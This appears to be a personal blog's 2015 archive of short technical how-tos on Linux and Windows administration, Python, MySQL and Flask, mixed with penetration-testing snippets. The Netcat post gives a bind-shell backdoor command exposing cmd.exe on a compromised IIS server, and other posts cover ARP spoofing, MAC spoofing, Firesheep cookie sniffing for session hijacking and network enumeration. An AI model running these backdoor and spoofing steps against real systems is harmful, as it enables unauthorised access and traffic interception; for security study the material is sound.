
Showing posts from 2015

Backup your hdd to an image

Back up a partition to a compressed image with the following command (unmount the partition first so the image is consistent):

dd bs=4096 conv=noerror,sync if=/dev/sdc1 | gzip -c > img.gz

Note: don't save img.gz on sdc1 itself.

To restore the backup image:

gunzip -c img.gz | dd of=/dev/sdc1

To verify, hash the uncompressed image and the partition and compare the two digests:

gunzip -c img.gz | sha1sum
sha1sum /dev/sdc1

Caveat: conv=sync zero-pads a short final read up to the 4096-byte block size, so if the partition size is not a multiple of 4096 bytes the image is slightly longer than the partition and the digests will differ even though the data is intact; in that case compare the sizes or repeat the dump with bs=512.

Trace Application in Linux

Using strace.

Installation (Fedora):

dnf install strace

Running:

strace -Tttvfs 1024 -o <output_file> <command>

(-T shows the time spent in each syscall, -tt prints timestamps with microseconds, -v prints unabbreviated arguments, -f follows child processes, -s 1024 raises the maximum printed string length, -o writes the trace to a file.)

Fortran, C and C++ for Windows

Download from:
http://www.equation.com/servlet/equation.cmd?fa=fortran and install it, or extract it to C:\MinGW. If your code uses winsock.h or winsock2.h, compile it as below.

Compile the code with: gcc code.c -lws2_32

This help came from an IRC channel:
<Love4Boobies> Move the -lws2_32 at the very end.

Python MySql

Simple use of MySQL from Python.

Create the table:

mysql> CREATE TABLE pc_data (
    -> pc_id INT NOT NULL AUTO_INCREMENT,
    -> pc_title VARCHAR(100) NOT NULL,
    -> pc_command VARCHAR(100) NOT NULL,
    -> pc_ip VARCHAR(100) NOT NULL,
    -> pc_result VARCHAR(200) NOT NULL,
    -> PRIMARY KEY ( pc_id )
    -> );

Insert a row from Python. The values are passed as query parameters so the driver quotes them; pasting ipaddress and useragent straight into the SQL string (as the original one-liner did) breaks on embedded quotes and opens the query to SQL injection:

cursor.execute("INSERT INTO pc_data (pc_title, pc_command, pc_ip, pc_result) VALUES (%s, %s, %s, %s)",
               ("PC", "ipconfig", ipaddress, useragent))

1:
>>> import _mysql
>>> db=_mysql.connect()
>>> db=_mysql.connect(host="localhost",user="joebob",passwd="moonpie",db="thangs")
>>> db.query("select * from comPc where com_id = 1")
>>> r = db.use_result()
>>> r.fetch_row()
(('3','2','0'),)
>>> r.fetch_row()
()
2:
>>> import MySQLdb
>>> db=MySQLdb.connect(passwd="moonpie",db="thangs")
>>> c=db.cursor()
>>> c.execute…

Flask Request environ

Read a single WSGI variable with request.environ['<key>'], where <key> is one of the names in the dictionary below (a dump of request.environ from a development server):
{'wsgi.multiprocess': False,
'HTTP_X_FORWARDED_SERVER': 'freely-openly.rhcloud.com',
'HTTP_X_FORWARDED_HOST': 'freely-openly.rhcloud.com',
'HTTP_X_CLIENT_IP': '00.00.00.00',
'SERVER_SOFTWARE': 'Werkzeug/0.8.3',
'SCRIPT_NAME': '',
'REQUEST_METHOD': 'GET',
'PATH_INFO': '/',
'SERVER_PROTOCOL': 'HTTP/1.1',
'QUERY_STRING': '',
'werkzeug.server.shutdown': <function shutdown_server at 0x7f303c4c6b18>,
'CONTENT_LENGTH': '',
'HTTP_USER_AGENT': 'Mozilla/5.0 (X11; Fedora; Linux i686; rv:41.0) Gecko/20100101 Firefox/41.0',
'HTTP_CONNECTION': 'Keep-Alive',
'SERVER_NAME': '00.00.00.00',
'REMOTE_PORT': 17727,
'wsgi.url_scheme': 'http',
'SERVER_PORT': '8080',
'werkze…

Java for Linux

Java Downloads for Linux https://www.java.com/en/download/linux_manual.jsp

## java ##
alternatives --install /usr/bin/java java /usr/java/latest/jre/bin/java 200000

## javaws ##
alternatives --install /usr/bin/javaws javaws /usr/java/latest/jre/bin/javaws 200000

## Java Browser (Mozilla) Plugin 32-bit ##
alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so libjavaplugin.so /usr/java/latest/jre/lib/i386/libnpjp2.so 200000

## Java Browser (Mozilla) Plugin 64-bit ##
alternatives --install /usr/lib64/mozilla/plugins/libjavaplugin.so libjavaplugin.so.x86_64 /usr/java/latest/jre/lib/amd64/libnpjp2.so 200000

## Install javac only if you installed the JDK (Java Development Kit) package ##
alternatives --install /usr/bin/javac javac /usr/java/latest/bin/javac 200000
alternatives --install /usr/bin/jar jar /usr/java/latest/bin/jar 200000

Linux and Unix screen command

Installing in Fedora:

yum install screen

Start screen for the first time:

mib@itsecur1ty ~ $ screen

Show the screen key bindings: type "Ctrl-A" and then "?" (without quotes) to see all commands and parameters. To leave the help screen, press the space bar or Enter.

Re-attach a screen session:

mib@itsecur1ty ~ $ screen -r

Use screen -ls to see how many screen sessions are available:

mib@itsecur1ty ~ $ screen -ls

To restore a particular session, give its number:

mib@itsecur1ty ~ $ screen -r "number"

Note: alternatives to GNU Screen for the Linux terminal are tmux, dvtm and dtach.

SSH server freeSSHD

freeSSHd, as its name says, is a free implementation of an SSH server. It provides strong encryption and authentication over insecure networks like the Internet. Users can open a remote console or even access their remote files thanks to the built-in SFTP server.

Download : freeSSHd
Tutorial : IBM tutorial

 add User ..


NetCat – The "Swiss Army Knife"

Port scanning with Netcat
A scanning example from Hobbit is "nc -v -w 2 -z target 20-30".

Netcat as a BackDoor
So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in order to get a remote command prompt.

In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS server (let's choose port 10001) and then we can connect to this port from our attacking machine... using Netcat of course!
The command we want to give on the server looks like this:

nc -L -p 10001 -d -e cmd.exe

Transferring files using Netcat
Let's look at other possibilities Netcat can provide. Say we wanted to transfer a file called hack.txt to the IIS server, and for some reason we don't want to TFTP the file. We can use Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination system, start Netcat on the IIS server with the following command:

nc -l -p 1234 >hack.txt

nc destination 1234 <h…

Windows 7

Windows 7 Home Basic (developing markets only)
Windows 7 Starter
Windows 7 Starter x64
Windows 7 Home Premium
Windows 7 Home Premium (x64)
Windows 7 Home Premium N (European Union only)
Windows 7 Professional
Windows 7 Professional (x64)
Windows 7 Enterprise
Windows 7 Enterprise (x64)
Windows 7 Ultimate
Windows 7 Ultimate (x64)

OEM Versions
One of the biggest secrets in the software world is that Microsoft’s operating systems are
available from online retailers in so-called OEM (“original equipment manufacturer”)
versions (which come in just the Full SKU) that are aimed at the PC builder market. These
are the small “mom and pop”-type PC makers who build hand-crafted machines for local
markets. OEM packaging is bare-bones and does not come with a retail box. Instead, you
get the disc, a Product Key, and a slip of paper describing the product.

OEM versions of Windows 7 differ from retail versions in some important ways:
♦ They are dramatically cheaper than retail versions.
the OEM versions of Windows 7 …

Block unwanted advertisements with /etc/hosts file on Linux

Now we will make the shell script. Run:

vi /root/update_hosts.sh

Fill the file with the following. Compared with a bare rm/mv, this version stops on any failed step, so a failed download cannot leave you without an /etc/hosts, and it keeps a backup of the previous file; ~/.etchosts holds your own entries, which are appended after the downloaded list:

#!/bin/bash
set -e
cd /tmp
# Download the ad-blocking hosts list into a temporary file
wget -O hosts.txt http://winhelp2002.mvps.org/hosts.txt
# Keep a copy of the current hosts file before replacing it
cp /etc/hosts /etc/hosts.bak
# Install the new list, then append your own entries
mv hosts.txt /etc/hosts
cat ~/.etchosts >> /etc/hosts

Now we have to make sure the script is executable, then run it:

chmod +x update_hosts.sh
./update_hosts.sh

Note that the list is fetched over plain HTTP; look over the downloaded file before it replaces /etc/hosts, since every entry in it redirects name resolution system-wide.

For Windows check this: http://winhelp2002.mvps.org/

Firefox plugins

Firesheep – Firefox plugin

Firesheep is a classic Penetration Testing tool used to audit web sessions. Firesheep is an extension for the Firefox web browser; however, some versions have been unstable with recent Firefox releases. Firesheep acts as a packet sniffer that intercepts unencrypted cookies from websites while they transmit over a network.

Web Developer – Firefox plugin
Web Developer is an extension for Firefox that adds editing and debugging tools for web developers. Web Developer can be downloaded for free from the Firefox plugin store. One feature in Web Developer useful for session hijacking is the ability to edit cookies. This can be found as a drop-down option from the Firefox browser once Web Developer is installed.

Greasemonkey – Firefox plugin
Greasemonkey is a Firefox plugin that allows users to install scripts that make on the fly changes to web page content before or after the page is loaded. 
Greasemonkey can be used for customizing a web page appearance,…

Getting started with TCPDump

To start off, let's look at the usage specification for TCPDump:

tcpdump [ -AbdDefhHIJKlLnNOpqRStuUvxX ]
        [ -B buffer_size ] [ -c count ] [ -C file_size ]
        [ -G rotate_seconds ] [ -F file ]
        [ -i interface ] [ -j tstamp_type ] [ -m module ] [ -M secret ]
        [ -Q in|out|inout ] [ -r file ]
        [ -V file ] [ -s snaplen ] [ -T type ] [ -w file ] [ -W filecount ]
        [ -E spi@ipaddr algo:secret,... ] [ -y datalinktype ]
        [ -z postrotate-command ] [ -Z user ] [ expression ]

Abusing address resolution

The address resolution protocol exists as a service that translates IP addresses
into MAC addresses.
Hosts make ARP requests to obtain information about the MAC address associated with a given IP address.
A host will broadcast a message across the entire local network segment, hoping to receive a response from the host associated with the requested IP address.
The fundamental flaw in the address resolution protocol is that it inherently lacks any form of authentication and message integrity.
This means that, when a response is received for a MAC address lookup, the receiving host has no way of determining its origin, and is left to blindly assume it comes from the correct host. To an attacker, what this means is that you can convince devices to forward you packets that are actually intended for another user by forging responses to ARP requests.
Kali Linux has a tool that helps facilitate ARP abuse; it's called ArpSpoof and following is the usage specification for it:

arpspoof [-ic…

Spoofing MAC addresses

To change your MAC address using Kali Linux, you can use a tool called macchanger with the following command:

macchanger [-hVeaArls] [-m,--mac,--mac= MAC_ADDRESS] INTERFACE

Following is an example of macchanger in action (the interface must be down while the address is changed; note that ifconfig takes the interface name before the up/down keyword):

ifconfig eth0 down
macchanger --mac=01:02:03:04:05:06 eth0
ifconfig eth0 up

Interrogating the Whois servers

whois [IP address]
As an example, here's how you retrieve the Whois record for one of the Google
server addresses:

whois 74.125.233.83

Dumping the NetBIOS Name Table with Nbtstat and Nbtscan

Another great built-in tool is nbtstat, which calls up the NetBIOS Name Table from a remote system. The Name Table contains a great deal of information, as shown in the following example:

C:\>nbtstat -A 192.168.202.33
Local Area Connection:
Node IpAddress: [192.168.234.244] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    CAESARS        <00>  UNIQUE      Registered
    VEGAS2         <00>  GROUP       Registered
    VEGAS2         <1C>  GROUP       Registered
    CAESARS        <20>  UNIQUE      Registered
    VEGAS2         <1B>  UNIQUE      Registered
    VEGAS2         <1E>  GROUP       Registered
    VEGAS2         <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-01-03-27-93-8F

As illustrated, nbtstat extracts the system name (CAESARS), the domain or workgroup it's in (VEGAS2), and the Media Access Control (MAC) address. These entities can be identified by their NetBIOS suffixes (the two-digit hexadecimal number to the right of…

Enumerating Domains with Net View

The net view command is a great example of a built-in enumeration tool. Net view is an extraordinarily simple command-line utility that will list domains available on the network and then lay bare all machines in a domain. Here's how to enumerate domains on the network using net view:

C:\>net view /domain
Domain
-----------------------------------------------------------------------
CORLEONE
BARZINI_DOMAIN
TATAGGLIA_DOMAIN
BRAZZI
The command completed successfully.

Supplying an argument to the /domain switch will list computers in a particular domain, as shown next:

C:\>net view /domain:corleone

For the command-line challenged, the Network Neighborhood shows essentially the …

Configuring the Windows Time Service

To configure Windows time service to use an internal hardware clock, follow these steps:

1. Click Start, click Run, type regedit, and then click OK.

2. Locate and then click on the registry subkey HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters.

3. In the right pane, right-click ReliableTimeSource, and then click Modify.

4. In Edit DWORD Value, type 1 in the Value data box, and then click OK.

5. Locate and then click on the registry subkey HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters.

6. In the right pane, right-click LocalNTP, and then click Modify.

7. In Edit DWORD Value, type 1 in the Value data box, and then click OK.

8. Quit Registry Editor.

9. At the command prompt, run the net stop w32time && net start w32time command to restart the Windows time service.

10. Run the w32tm -s command on all computers other than the time server to reset the local computer's time against the time server.